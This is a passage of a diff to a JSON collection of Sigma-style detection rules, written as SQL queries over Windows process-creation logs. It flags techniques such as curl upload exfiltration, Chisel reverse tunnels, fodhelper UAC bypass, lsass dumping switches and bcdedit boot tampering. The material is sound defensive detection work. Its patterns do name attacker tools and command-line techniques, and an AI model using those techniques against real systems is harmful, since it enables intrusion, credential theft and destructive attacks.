Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.execution" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", + "status": "stable", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "Remote Access Tool - GoToAssist Execution", - "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", + "title": "Suspicious ZipExec Execution", + "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" + "filename": "proc_creation_win_hktl_zipexec.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "Suspicious Csc.exe Source File Folder", - "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", + "id": "74403157-20f5-415d-89a7-c505779585cf", "status": "test", - "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", - "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + "Legitimate use to pass password to different powershell commands" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" ], - "filename": "proc_creation_win_csc_susp_folder.yml" + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Suspicious Scheduled Task Creation via Masqueraded XML File", + "id": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence", + "author": "Swachchhanda Shrawan Poudel, Elastic (idea)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.persistence", + "attack.t1036.005", + "attack.t1053.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/create%' ESCAPE '\\' OR CommandLine LIKE '%-create%' ESCAPE '\\') AND (CommandLine LIKE '%/xml%' ESCAPE '\\' OR CommandLine LIKE '%-xml%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%.xml%' ESCAPE '\\') OR (IntegrityLevel = 'System') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%:\\\\WINDOWS\\\\Installer\\\\MSI%' ESCAPE '\\' AND ParentCommandLine LIKE '%.tmp,zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\'))) AND NOT (((ParentProcessName LIKE '%:\\\\ProgramData\\\\OEM\\\\UpgradeTool\\\\CareCenter\\_%\\\\BUnzip\\\\Setup\\_msi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Camera Station\\\\SetupActions.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Device Manager\\\\AdmSetupActions.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files (x86)\\\\Zemana\\\\AntiMalware\\\\AntiMalware.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files\\\\Dell\\\\SupportAssist\\\\pcdrcui.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" }, { - "title": "Suspicious Cabinet File Execution Via Msdt.EXE", - "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "status": "experimental", - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", + "title": "Suspicious XOR Encoded PowerShell Command", + "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "status": "test", + "description": "Detects presence of a potentially xor encoded powershell command", + "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Legitimate usage of \".diagcab\" files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_susp_cab_options.yml" + "filename": "proc_creation_win_powershell_xor_commandline.yml" }, { - "title": "Scheduled Task Creation", - "id": "92626ddd-662c-49e3-ac59-f6535f12d189", + "title": "Potential Data Exfiltration Via Curl.EXE", + "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", "status": "test", - "description": "Detects the creation of scheduled tasks in user session", + "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.005", - "attack.s0111", - "car.2013-08-001" + "attack.exfiltration", + "attack.t1567", + "attack.t1105" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Scripts created by developers and admins" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\') AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation.yml" + "filename": "proc_creation_win_curl_fileupload.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", - "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", + "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", + "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "status": "test", + "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", + "author": "@neu5ron", + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.persistence", + "attack.t1542.003" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_bcdedit_susp_execution.yml" + }, + { + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "PUA - Potential PE Metadata Tamper Using Rcedit", - "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", - "status": "experimental", - "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", - "author": "Micah Babinski", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036", - "attack.t1027.005", - "attack.t1027" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use of the tool by administrators or users to update metadata of a binary" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rcedit_execution.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process 